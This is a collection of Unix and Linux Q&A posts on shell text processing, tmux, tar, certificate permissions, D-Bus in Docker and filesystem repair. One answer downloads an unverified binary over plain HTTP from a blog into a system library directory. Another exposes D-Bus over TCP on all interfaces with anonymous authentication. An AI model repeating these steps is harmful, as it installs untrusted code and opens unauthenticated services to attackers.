SOLUTION What a mess this DRM situation is. A lot of outdated info on the internet, but I managed to find a solution: https://blog.vpetkov.net/2019/07/12/netflix-and-spotify-on-a-raspberry-pi-4-with-latest-default-chromium/
cd /usr/lib/chromium-browser
wget http://blog.vpetkov.net/wp-content/uploads/2019/09/libwidevinecdm.so_.zip
unzip libwidevinecdm.so_.zip && chmod 755 libwidevinecdm.so
In my case, replacing the libwidevine was sufficient. I did not have to alter my user agent.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/546699", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/264960/" ] }
546,709
The user (33) is not able to read the web.{crt,key} files. Do I have to give permission all through the links or is there a clever way to do this?
# ll /mnt/efs/cert
total 20
-rw-r--r-- 1 33 tape 1237 Oct  9 14:30 dag.crt
-rw-r--r-- 1 33 tape 1704 Oct  9 14:30 dag.pem
drwxr-xr-x 2 33 tape 6144 Dec  7  2018 ldap
lrwxrwxrwx 1 33 tape   74 Oct 14 12:13 web.crt -> /etc/letsencrypt/live/domain/fullchain.pem
lrwxrwxrwx 1 33 tape   72 Oct 14 12:13 web.key -> /etc/letsencrypt/live/domain/privkey.pem
# ll /etc/letsencrypt/live/domain/
total 4
lrwxrwxrwx 1 root root  62 Oct 14 12:01 cert.pem -> ../../archive/domain/cert1.pem
lrwxrwxrwx 1 root root  63 Oct 14 12:01 chain.pem -> ../../archive/domain/chain1.pem
lrwxrwxrwx 1 root root  67 Oct 14 12:01 fullchain.pem -> ../../archive/domain/fullchain1.pem
lrwxrwxrwx 1 root root  65 Oct 14 12:01 privkey.pem -> ../../archive/domain/privkey1.pem
-rw-r--r-- 1 root root 692 Oct 14 12:01 README
# ll /etc/letsencrypt/archive/domain/
total 16
-rw-r--r-- 1 root root 1972 Oct 14 12:01 cert1.pem
-rw-r--r-- 1 root root 1647 Oct 14 12:01 chain1.pem
-rw-r--r-- 1 root root 3619 Oct 14 12:01 fullchain1.pem
-rw------- 1 root root 1708 Oct 14 12:01 privkey1.pem
The symlinks themselves are not the problem: permission bits on symlinks are ignored, and what matters is whether user 33 can traverse every directory on the path and read the final target. By default certbot keeps /etc/letsencrypt/live and /etc/letsencrypt/archive readable by root only, and the private key ( privkey1.pem , mode 0600 here) is root-only as well, so the web server user is blocked before it ever reaches the files. Typical ways to handle this: let the service read the certificates as root and drop privileges afterwards (this is what most web servers such as nginx and Apache do, so pointing them straight at /etc/letsencrypt/live/domain/ works); or grant access via a group, e.g. create a certaccess group, add user 33 to it, chgrp the live and archive directories and the key to it, chmod 750 the directories and chmod 640 the key; or use a certbot deploy hook to copy the files on each renewal to a location the service can read. Whichever you choose, keep the private key unreadable to anyone who doesn't strictly need it.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/546709", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/15401/" ] }
546,726
I'm creating two apps, master and slave, which communicate over d-bus. My apps work as expected when being run on the same host. Now I want to move the slave app to a docker container and I'm having problems sharing the d-bus session between host and container. Here's my Dockerfile:
FROM i386/ubuntu:16.04
VOLUME /run/user/1000/
ENV DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1000/bus
RUN apt-get update
RUN apt-get upgrade -y
RUN apt-get install -y dbus
#RUN apt-get install -y libnotify-bin
#RUN apt-get install -y dbus-x11
RUN adduser -u 1000 myuser
#COPY dbus.conf /etc/dbus-1/session.d/
USER 1000:1000
ENTRYPOINT ["dbus-daemon", "--session", "--print-address"]
/run/user/1000/bus is the value of my DBUS_SESSION_BUS_ADDRESS variable. And I create the container with
docker create --mount type=bind,source=/run/user/1000/bus,target=/run/user/1000/bus mycontainer
/run/user/1000/bus is visible from within the container, but when the container is started it prints the address unix:abstract=/tmp/dbus-iXrYzptYOX,guid=78a790f0f6a4387a39ac3d505da478a3 and my apps cannot communicate. If I add my dbus.conf to /etc/dbus-1/session.d/ in the container and override <listen>unix:path=/run/user/1000/bus</listen> I get the message 'Failed to start message bus: Failed to bind socket "/run/user/1000/bus": Address already in use' I'm not sure whether I'm even supposed to be starting dbus-daemon inside docker. How can I make this work?
I've found a solution. Here's my Dockerfile:
FROM i386/ubuntu:16.04
RUN apt-get update
RUN apt-get upgrade -y
RUN apt-get install -y dbus
COPY dbus.conf /etc/dbus-1/session.d/
ENTRYPOINT ["dbus-run-session", "slaveApp"]
And my dbus.conf:
<!DOCTYPE busconfig PUBLIC "-//freedesktop//DTD D-Bus Bus Configuration 1.0//EN" "http://www.freedesktop.org/standards/dbus/1.0/busconfig.dtd">
<busconfig>
  <listen>tcp:host=localhost,bind=*,port=6667,family=ipv4</listen>
  <listen>unix:tmpdir=/tmp</listen>
  <auth>ANONYMOUS</auth>
  <allow_anonymous/>
</busconfig>
And set the address variable on host:
export DBUS_SESSION_BUS_ADDRESS=tcp:host=${containerIp},port=6667,family=ipv4
In my master app I initiate a connection (I used Qt):
QDBusConnection::connectToBus("tcp:host=${containerIp},port=6667", "qt_default_session_bus");
The master app can now send messages to slave app. I haven't tried to send messages from slave to master, though. The answer is taken from this post: https://stackoverflow.com/a/45487266/6509266
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/546726", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/290688/" ] }
546,769
I'm installing some of my data from my old server to my new server. Since I had my old server for ages, I have a huge amount of legacy data with, most certainly, legacy user and group names. When extracting, tar does its best to match the user and group info by name and uses the identifiers as a fallback or the current user as a last resort. What I'd like to do is make sure that all the users and groups exist before I do the extraction. That way all the files get the correct ids. To do that, the best way I can think of is to list all the user and group names found in the tar file. I know I can use the tar tvf backup.tar command to list all the files, but then I'd have to come up with a way to extract the right two names. I'm wondering whether there would be a simpler way than using the tv option. Some tool or command line options that only extracts the user name and group name, the I can use sort -u to reduce the list to unique entries. Anyone knows of such a feature?
Interesting question. From a quick look through the man page (searching for "user" and, when that didn't turn up results, searching for "owner") the following should do it:

tar xf thetarball.tgz --to-command='sh -c "echo $TAR_UNAME $TAR_GNAME"' | sort | uniq -c

Obviously, change the script according to your needs. You might want $TAR_UID and $TAR_GID instead of the names for some use cases. I recommend also that you read up on the --owner-map and --group-map options for tar ; they sound like they could greatly benefit your use case and would be a lot simpler than creating all the users and groups ahead of time.
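If you do want to pre-create the missing accounts before extracting, a minimal sketch building on the command above (run as root; the archive name and the useradd/groupadd defaults are assumptions, and their flags vary between distributions):

# List unique "user group" pairs in the archive, then create any that are missing.
tar xf thetarball.tgz --to-command='sh -c "echo $TAR_UNAME $TAR_GNAME"' \
  | sort -u \
  | while read -r user group; do
      getent group "$group" >/dev/null || groupadd "$group"
      getent passwd "$user" >/dev/null || useradd -g "$group" "$user"
    done

Newly created accounts get fresh numeric IDs, of course; if you need the original IDs preserved, the --owner-map/--group-map approach is the better fit.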
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/546769", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/57773/" ] }
546,820
Frequently I want to exit my ssh session without also killing the tmux session I am using. To do this I have to run the following commands:

tmux detach
exit

or alternatively use the shortcut Ctrl+B D and then exit . Is there a way to streamline this into one command? I've tried using an alias but it seems to execute both commands inside the tmux session.
You can use tmux detach -P . Or use ~ . to exit ssh (which will detach tmux because its tty disappears).
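If you want this as a single key press, a minimal sketch is to add a binding to ~/.tmux.conf (the key Q is an arbitrary choice of mine):

# Prefix + Q: detach and send SIGHUP to the client's parent process,
# which also ends the enclosing ssh session
bind-key Q detach-client -P

After reloading the configuration with tmux source-file ~/.tmux.conf, pressing Ctrl+B Q does the detach and the exit in one step.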
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/546820", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/134585/" ] }
546,934
Got here a list of columns, as follows:

59 LOUIS 1202 +1
60 FREDDIE 1201 +4
61 FINLAY 1200 -2
62 LEON 1137 +12
63 HARLEY 1132 +6
64 DAVID 1127 -1
65 MOHAMMAD 1100 +6
66 REECE 1095 -1
67 KIAN 1090 0
68 KAI 1056 -6
69 KYLE 1030 -18
70 BRANDON 1011 -4
71 HAYDEN 1006 +5
72 ZACHARY 995 +10
73 KIERAN 973 -12
73 LUCA 973 -1
75 ASHTON 954 +4
76 BAILEY 939 -6
77 JAKE 913 +10
78 GABRIEL 910 +14
79 SAM 900 -2
80 EVAN 890 0
81 BRADLEY 847 -13

How could one extract only the lines whose name begins with, for example, the letter "L", such as:

73 LUCA 973 -1
That seems to be a duplicate, but anyway, if I understood it correctly, one may do it as follows. First, save the list in a file, say list.txt , then:

sed -rn '/^[^\s]+\s+[L]/p' list.txt > result.txt

which should leave the following output in the result.txt file:

59 LOUIS 1202 +1
62 LEON 1137 +12
73 LUCA 973 -1

Put any other initial letter inside the brackets to extract the names beginning with that letter instead.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/546934", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/377374/" ] }
546,989
Got here a list, as follows:

07:41 0840228.32P379995.de472.netzwerk.com.br,S=307582,W=311813:2,
04:11 1574312.116821186.der472.netzwerk.com.br,S=301166,W=307582:2,
06:22 1540376.98P379995.der472.netzwerk.com.br,S=311813,W=312391:2,
03:39 8712441.254782468.de472.netzwerk.com.br,S=307387,W=311615:2,
07:35 9841630.971395138.de472.netzwerk.com.br,S=303039,W=303039:2,
01:16 2369857.123688174.de472.netzwerk.com.br,S=298927,W=311615:2,
01:08 1845871.564387663.de472.netzwerk.com.br,S=304067,W=305586:2,
08:07 1236913.325890982.de472.netzwerk.com.br,S=299941,W=304067:2,
05:70 1086215.397447162.de472.netzwerk.com.br,S=306747,W=309789:2,
06:41 9513575.225890982.de472.netzwerk.com.br,S=305586,W=306747:2,
01:70 1965849.125749892.de472.netzwerk.com.br,S=313423,W=309171:2,
09:12 9564136.687415393.de472.netzwerk.com.br,S=309171,W=313423:2,

Could a ";" (semicolon) be added in place of the space between the hour and the file name in each line, so that it would result as follows?

07:41;0840228.32P379995.de472.netzwerk.com.br,S=307582,W=311813:2,
04:11;1574312.116821186.der472.netzwerk.com.br,S=301166,W=307582:2,
06:22;1540376.98P379995.der472.netzwerk.com.br,S=311813,W=312391:2,
03:39;8712441.254782468.de472.netzwerk.com.br,S=307387,W=311615:2,
07:35;9841630.971395138.de472.netzwerk.com.br,S=303039,W=303039:2,
01:16;2369857.123688174.de472.netzwerk.com.br,S=298927,W=311615:2,
01:08;1845871.564387663.de472.netzwerk.com.br,S=304067,W=305586:2,
08:07;1236913.325890982.de472.netzwerk.com.br,S=299941,W=304067:2,
05:70;1086215.397447162.de472.netzwerk.com.br,S=306747,W=309789:2,
06:41;9513575.225890982.de472.netzwerk.com.br,S=305586,W=306747:2,
01:70;1965849.125749892.de472.netzwerk.com.br,S=313423,W=309171:2,
09:12;9564136.687415393.de472.netzwerk.com.br,S=309171,W=313423:2,
Since there are no other space characters in your list, you can use sed to replace the first space character in each line with a semicolon: sed 's/ /;/' file
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/546989", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/377374/" ] }
547,093
I want to run a series of tests (each on a different PID), and derive a successful status only if all tests exit successfully. Something like check $PID1 && check $PID2 && check $PID3 but for an indeterminate number of tests. How can I accomplish this?
That shouldn't be too hard to write out as a loop:

pids=(1025 3425 6474)

check_all() {
    for pid in "$@"; do
        if ! check "$pid"; then
            return 1
        fi
    done
}

check_all "${pids[@]}"

Like the chain of commands linked with && , the function will stop on the first failing check . Though do note that I replaced your variables PID1 , PID2 etc. with a single array. Bash could iterate over variables whose names start with a particular string, but arrays are just more convenient. (Unless those variables come from the outside of the script through the environment, where you can't pass proper arrays.) Also, I hard-coded the check command in the loop here. You could pass distinct commands for the function to run, but that's ripe with issues with word splitting and quote handling. (See here and here .)
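For a concrete test run, check can be any command that succeeds or fails per PID. A minimal stand-in (my assumption, not part of the question) that simply tests whether each process is still alive:

# Succeeds if the PID exists and we are allowed to signal it
check() {
    kill -0 "$1" 2>/dev/null
}

check_all "${pids[@]}" && echo "all processes passed"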
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/547093", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/23344/" ] }
547,119
File contents:

RANDOM TEXT num1=400 num2=15 RANDOM TEXT
RANDOM TEXT num1=300 num2=10 RANDOM TEXT
RANDOM TEXT num1=200 num2=5 RANDOM TEXT

I would like to subtract 5 from each num2 per line, like so:

RANDOM TEXT num1=400 num2=10 RANDOM TEXT
RANDOM TEXT num1=300 num2=5 RANDOM TEXT
RANDOM TEXT num1=200 num2=0 RANDOM TEXT

Pure bash is preferred, but no biggie if another GNU tool does it better.
Using awk :

awk '{ for (i=1;i<=NF;i++) { if ($i ~ /num2=/) {sub(/num2=/, "", $i); $i="num2="$i-5; print} } }' file

This will loop through each column of each line looking for the column that contains num2= . When it finds that column it will:

1. Remove num2= - sub(/num2=/, "", $i)
2. Redefine that column as num2={oldnum-5} - $i="num2="$i-5
3. Print the line - print
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/547119", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/109055/" ] }
547,156
I have a few environment variables; there are multiple such values I want to convert dynamically. I'm getting each env variable using printenv | grep proj_env_repo (i.e. printenv | grep $value , where the value is proj_env_repo ), and my result is

proj_env_repo_db_username=username

I want to convert it to

TF_ENV_db_username=username

Can someone help me with it? I'm looking for a function in a bash script.
Using variable name prefix matching and variable indirection in bash :

proj_env_repo_db_username=username
proj_env_repo_db_host=host
proj_env_repo_db_port=port

for variable in "${!proj_env_repo@}"; do
    export "TF_ENV${variable#proj_env_repo}"="${!variable}"
done

The loop uses "${!proj_env_repo@}" to generate a list of variable names that share the name prefix proj_env_repo . In each iteration $variable will be the name of one of these variables. Inside the loop, export is used to create a new environment variable by stripping off the proj_env_repo prefix and replacing it with the string TF_ENV . The value for the new environment variable is had using the variable indirection ${!variable} , i.e. the value of the variable whose name is stored in $variable . To additionally unset the original variable, use unset "$variable" after export , before the end of the loop. Test running this with tracing turned on:

$ bash -x script.sh
+ proj_env_repo_db_username=username
+ proj_env_repo_db_host=host
+ proj_env_repo_db_port=port
+ for variable in "${!proj_env_repo@}"
+ export TF_ENV_db_host=host
+ TF_ENV_db_host=host
+ for variable in "${!proj_env_repo@}"
+ export TF_ENV_db_port=port
+ TF_ENV_db_port=port
+ for variable in "${!proj_env_repo@}"
+ export TF_ENV_db_username=username
+ TF_ENV_db_username=username

As a function taking the old name prefix as its 1st argument and the new prefix as its 2nd argument:

rename_var () {
    # Make sure arguments are valid as variable name prefixes
    if ! [[ $1 =~ ^[a-zA-Z_][a-zA-Z_0-9]*$ ]] || ! [[ $2 =~ ^[a-zA-Z_][a-zA-Z_0-9]*$ ]]
    then
        echo 'bad variable name prefix' >&2
        return 1
    fi

    eval 'for variable in "${!'"$1"'@}"; do
        export "'"$2"'${variable#'"$1"'}"="${!variable}"
    done'
}

We resort to using eval over the loop here since bash does not support the syntax ${!$1@} . The function constructs the appropriate shell code (as a string) for renaming the variables according to the values of $1 and $2 (the 1st and 2nd argument given to the function), and then uses eval to execute this shell code. You would use this function as

rename_var proj_env_repo TF_ENV

... or, using variables,

rename_var "$old_variable_prefix" "$new_variable_prefix"

Note: When doing things like these (using eval on user input), you must test that the code that you evaluate is valid and that it is what you expect it to be. In this case this means validating $1 and $2 as valid variable name prefixes. Otherwise at least quotes and } will cause syntax errors in the eval , and there is a possibility of command injection. Note: This is the first time (I think) that I've ever had to use eval . I would never put myself in the position of having to use the above code though, but I don't know the background story to the question, obviously, so that's not real criticism of the question (which is an interesting one in itself). Related (on the Software Engineering site): Why are eval-like features considered evil, in contrast to other possibly harmful features?
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/547156", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/270087/" ] }
547,194
I am trying to remove some extremely large directories, however with no success. Here are some observations:

# cwd contains the two larger directories
$ ls -lhF
drwxrwxr-x 2 hongxu hongxu 471M Oct 16 18:52 J/
drwxr-xr-x 2 hongxu hongxu 5.8M Oct 16 17:21 u/
# Note that this is the output of `ls` of the directories themselves so they should be *huge*
# J/ seems much larger than u/ (containing more files), so take u/ as an example
$ rm -rf u/
# hang for a very long time, and finally report
rm: traversal failed: u: Bad message
$ cd u/
# can cd into u/ without problems
$ ls -lhF
# hang for a long time; cancel succeeds when I press Ctrl-C
$ rm *
# hang for a long time; cancel fails when I press Ctrl-C
# however there is no process associated with `rm` as reported by `ps aux`

These two directories mostly contain lots of small files (each of which not exceeding 10k, I suppose). Now I have to remove these two directories to free more disk space. What should I do?

UPDATE1: Please see the output of rm -rf u/ which reports rm: traversal failed: u: Bad message after quite a long time (> 2 hours). Therefore, the problem seems not to be about efficiency.

UPDATE2: When applying fsck , it reports as follows (seems fine):

$ sudo fsck -A -y /dev/sda2
fsck from util-linux 2.31.1
fsck.fat 4.1 (2017-01-24)
/dev/sda1: 13 files, 1884/130812 clusters
$ df /dev/sda2
Filesystem     1K-blocks      Used Available Use% Mounted on
/dev/sda2      244568380 189896000  43628648  82% /

UPDATE3: In case it may be relevant (but probably not), these two directories ( J/ and u/ ) contain terminfo generated by the tic command; different from regular compiled terminfo files (e.g., those inside /lib/terminfo ), these were generated with some fuzzing techniques so may not be "legal" terminfo files. irrelevant!

UPDATE4: Some more observations:

$ find u/ -type f | while read f; do echo $f; rm -f $f; done
# hang for a long time, IUsed (`df -i /dev/sda2`) not decreased

$ mkdir emptyfolder && rsync -r --delete emptyfolder/ u/
# hang for a long time, IUsed (`df -i /dev/sda2`) not decreased

$ strace rm -rf u/
execve("/bin/rm", ["rm", "-rf", "u"], 0x7fffffffc550 /* 121 vars */) = 0
brk(NULL) = 0x555555764000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=125128, ...}) = 0
mmap(NULL, 125128, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7ffff7fd8000
close(3) = 0
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\260\34\2\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=2030544, ...}) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ffff7fd6000
mmap(NULL, 4131552, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7ffff79e4000
mprotect(0x7ffff7bcb000, 2097152, PROT_NONE) = 0
mmap(0x7ffff7dcb000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1e7000) = 0x7ffff7dcb000
mmap(0x7ffff7dd1000, 15072, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7ffff7dd1000
close(3) = 0
arch_prctl(ARCH_SET_FS, 0x7ffff7fd7540) = 0
mprotect(0x7ffff7dcb000, 16384, PROT_READ) = 0
mprotect(0x555555762000, 4096, PROT_READ) = 0
mprotect(0x7ffff7ffc000, 4096, PROT_READ) = 0
munmap(0x7ffff7fd8000, 125128) = 0
brk(NULL) = 0x555555764000
brk(0x555555785000) = 0x555555785000
openat(AT_FDCWD, "/usr/lib/locale/locale-archive", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=1683056, ...}) = 0
mmap(NULL, 1683056, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7ffff7e3b000
close(3) = 0
ioctl(0, TCGETS, {B38400 opost isig icanon echo ...}) = 0
lstat("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
newfstatat(AT_FDCWD, "u", {st_mode=S_IFDIR|0755, st_size=6045696, ...}, AT_SYMLINK_NOFOLLOW) = 0
openat(AT_FDCWD, "u", O_RDONLY|O_NOCTTY|O_NONBLOCK|O_NOFOLLOW|O_DIRECTORY) = 3
fstat(3, {st_mode=S_IFDIR|0755, st_size=6045696, ...}) = 0
fcntl(3, F_GETFL) = 0x38800 (flags O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_NOFOLLOW|O_DIRECTORY)
fcntl(3, F_SETFD, FD_CLOEXEC) = 0
getdents(3, /* 2 entries */, 32768) = 48
getdents(3, /* 1 entries */, 32768) = 24
... (repeated lines)
getdents(3, /* 1 entries */, 32768) = 24
getdents(3
strace: Process 5307 detached
 <detached ...>
# (manually killed)

$ ls -f1 u/
./
../
../
../
../
... (repeated lines)
../

$ sudo journalctl -ex
Oct 17 16:00:16 CSLRF03AU kernel: JBD2: Spotted dirty metadata buffer (dev = sda2, blocknr = 0). There's a risk of filesystem corruption in case of system crash.
Oct 17 16:00:20 CSLRF03AU kernel: EXT4-fs error: 6971 callbacks suppressed
Oct 17 16:00:20 CSLRF03AU kernel: EXT4-fs error (device sda2): ext4_htree_next_block:948: inode #9789534: block 1020: comm find: Directory index failed checksum
Oct 17 16:00:20 CSLRF03AU kernel: EXT4-fs error (device sda2): ext4_htree_next_block:948: inode #9789534: block 1020: comm zsh: Directory index failed checksum
Oct 17 16:00:20 CSLRF03AU kernel: EXT4-fs error (device sda2): ext4_htree_next_block:948: inode #9789534: block 1020: comm rm: Directory index failed checksum
Oct 17 16:00:20 CSLRF03AU kernel: EXT4-fs error (device sda2): ext4_htree_next_block:948: inode #9789534: block 1020: comm find: Directory index failed checksum
Oct 17 16:00:20 CSLRF03AU kernel: EXT4-fs error (device sda2): ext4_htree_next_block:948: inode #9789534: block 1020: comm rsync: Directory index failed checksum
Oct 17 16:00:20 CSLRF03AU kernel: EXT4-fs error (device sda2): ext4_htree_next_block:948: inode #9789534: block 1020: comm zsh: Directory index failed checksum
Oct 17 16:00:20 CSLRF03AU kernel: EXT4-fs error (device sda2): ext4_htree_next_block:948: inode #9789534: block 1020: comm zsh: Directory index failed checksum
Oct 17 16:00:20 CSLRF03AU kernel: EXT4-fs error (device sda2): ext4_htree_next_block:948: inode #9789534: block 1020: comm rm: Directory index failed checksum
Oct 17 16:00:20 CSLRF03AU kernel: EXT4-fs error (device sda2): ext4_htree_next_block:948: inode #9789534: block 1020: comm find: Directory index failed checksum
Oct 17 16:00:20 CSLRF03AU kernel: EXT4-fs error (device sda2): ext4_htree_next_block:948: inode #9789534: block 1020: comm find: Directory index failed checksum
# #9789534 is the inode of `u/` as reported by `ls -i`

So it should be filesystem corruption. But rebooting does not work :(
Okay, I finally solved the issue. It was due to filesystem errors that caused ls to display wrongly, and other utilities to malfunction. I'm sorry that the question title is misleading (despite that there are indeed many files inside u/ , the directory is not extremely large ). I solved the problem by using a live USB, since the corrupted filesystem is / . The fix was simply applying

sudo fsck -cfk /dev/sda2

where /dev/sda2 is the corrupted disk.
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/547194", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/8776/" ] }
547,338
What is needed here is a command that generates six random dates within a given range of years (1987 to 2017). For example:

12/10/1987
30/04/1998
22/02/2014
17/08/2017
19/07/2011
14/05/2004

How could it be done, with sed , gawk , etc.?
With date , shuf and xargs : convert the start and end date to "seconds since 1970-01-01 00:00:00 UTC" and use shuf to print six random values in this range. Pipe this result to xargs and convert the values to the desired date format. Edit: If you want dates of the year 2017 to be included in the output, you have to add one year -1s ( 2017-12-31 23:59:59 ) to the end date. shuf -i generates random numbers including start and end.

shuf -n6 -i$(date -d '1987-01-01' '+%s')-$(date -d '2017-01-01' '+%s')\
 | xargs -I{} date -d '@{}' '+%d/%m/%Y'

Example output:

07/12/1988
22/04/2012
24/09/2012
27/08/2000
19/01/2008
21/10/1994
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/547338", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/377384/" ] }
547,448
I am writing a bash script to mount DFS Windows shares via cifs . I have the main part working, but I am having trouble when I need the user to enter the DFS path as a variable and convert the backslashes to forward slashes.

#!/bin/bash

FILE='\\edi3\welshch\test'
FILEPATH="$("$FILE" | sed -e 's/\\/\//gp')"
echo $FILEPATH

I had another script that used a command to find a filepath for AD home directories, then piped to sed as per the part | sed -e 's/\\/\//gp' . However this script above gives me:

./test.sh: line 10: \\edi3\welshch\test: command not found
Inside the command substitution you have "$FILE" | sed -e 's/\\/\//gp' , which the shell expands to (the equivalent of) '\\edi3\welshch\test' | sed -e 's/\\/\//gp' . Since it's a command , the shell goes looking for a file called \\edi3\welshch\test to run. You probably meant to use echo "$FILE" | sed ... to pass the contents of FILE to sed via the pipe. Note that even that's not right, some versions of echo will process the backslashes as escape characters, messing things up. You'll need printf "%s\n" "$FILE" | sed ... for it to work in all shells. See: Why is printf better than echo? Also, note that the default behaviour of sed is to print the line after whatever operations it does. When you use /p on the s/// command, it causes an additional print, so you get the result twice in the output. That said, since you're using Bash, you could just use the string replacement expansion:

#!/bin/bash
FILE='\\edi3\welshch\test'
FILEPATH=${FILE//\\//}
echo "$FILEPATH"

gives the output

//edi3/welshch/test
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/547448", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/106673/" ] }
547,492
Any idea how the context-menu terminal can be changed from the default gnome-terminal to tilix in Ubuntu 18.04 Bionic Beaver? I already tried renaming /usr/bin/gnome-terminal to /usr/bin/gnome-terminalbackup , then /usr/bin/tilix to /usr/bin/gnome-terminal , but without success; the context menu keeps running gnome-terminal.
a) Run apt install filemanager-actions-nautilus-extension

b) Run FileManager-Actions Configuration Tool

c) File => New Action

d01) Action tab: Mark "Display item in location context menu"

d02) Command tab:
Path: /usr/bin/tilix
Parameters: --working-directory=%d/%b
Working directory: %d

e) Restart Nautilus
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/547492", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/377217/" ] }
547,517
I have had a GNU screen session running for days. I find myself in the situation that I need to save the terminal contents (which I can scroll up to see) into a file. Is this possible? I estimate it to be below 5000 lines. I found a way to set up screen to log future output to a file. But in this case, I need to also save past output (or as much of it as is present).
You can use the hardcopy -h command to save the contents of the current scroll buffer to a file. As described in man screen :

hardcopy [-h] [file]

Writes out the currently displayed image to the file file, or, if no filename is specified, to hardcopy.n in the default directory, where n is the number of the current window. This either appends or overwrites the file if it exists. See below. If the option -h is specified, dump also the contents of the scrollback buffer.

You said:

I estimate it to be below 5000 lines.

5000 lines is really a lot. The default length of the scroll buffer in screen is just 100, not ~5000 lines. Unless you started your screen session with a larger scroll buffer setting, it will not be possible to retrieve all ~5000 lines of the scroll buffer.
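To raise that limit for future sessions, set a larger default in ~/.screenrc before starting screen (10000 is just an example value):

# ~/.screenrc: keep 10000 lines of scrollback per window
defscrollback 10000

For an already-running window you can issue Ctrl-a :scrollback 10000, but that only affects output captured from that point on.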
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/547517", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/309566/" ] }
547,527
I am bringing in log files via rsyslog and my config looks like the following:

root@rhel:/etc/rsyslog.d# head mail_prod_logs.conf
if $fromhost-ip=="10.10.10.10" and $programname=="AMP_Logs" then -/var/log/mail_logs/amp.log

My logs are all stored in the /var/log/mail_logs/amp.log file:

Oct 18 13:29:28 server.com AMP_Logs: Info: Begin Logfile
Oct 18 14:29:28 server.com AMP_Logs: Info: Version: 12.1.0-000 SN: .....
Oct 18 14:29:28 server.com AMP_Logs: Info: Time offset from UTC: -14400 seconds
Oct 18 15:29:23 server.com AMP_Logs: Info: Response received for.....
Oct 18 15:29:23 server.com AMP_Logs: Info: File reputation query.....
Oct 19 13:29:23 server.com AMP_Logs: Info: Response received for fil....
Oct 19 13:29:58 server.com AMP_Logs: Info: File reputation query ....
Oct 19 13:29:58 server.com AMP_Logs: Info: File reputation query ....

I would like to use the datetime portion of the log to put these in hourly folders inside of daily folders inside of the month, while the data is coming in, by editing mail_prod_logs.conf . So it would look like:

/var/log/mail_logs/Sep/30/23.log
/var/log/mail_logs/Oct/01/00.log
/var/log/mail_logs/Oct/01/01.log
/var/log/mail_logs/Oct/01/02.log
...

How can I do this?
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/547527", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/318540/" ] }
547,533
How would I list all directories containing the program name "minecraft"?
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/547533", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/377941/" ] }
547,551
I need a command which removes any data on the left side of the ; (semicolon) on each of the following rows:

07:48;1563101282.M178569P409830.de122.abteilung.com,S=1258,W=1287:2,
08:00;1563102004.M49870P436474.de122.abteilung.com,S=1258,W=1287:2,
08:16;1563102961.M195946P457876.de122.abteilung.com,S=1258,W=1287:2,
08:32;1563103921.M334168P463856.de122.abteilung.com,S=1258,W=1287:2,
08:48;1563104883.M883187P502037.de122.abteilung.com,S=1258,W=1287:2,
09:00;1563105603.M799240P519637.de122.abteilung.com,S=1258,W=1287:2,
09:16;1563106561.M419884P547969.de122.abteilung.com,S=1258,W=1287:2,
09:32;1563107524.M145768P582635.de122.abteilung.com,S=1258,W=1287:2,
09:48;1563108483.M632493P607265.de122.abteilung.com,S=1258,W=1287:2,
10:00;1563109203.M675460P633790.de122.abteilung.com,S=1258,W=1287:2,
10:16;1563110163.M299406P663234.de122.abteilung.com,S=1258,W=1287:2,
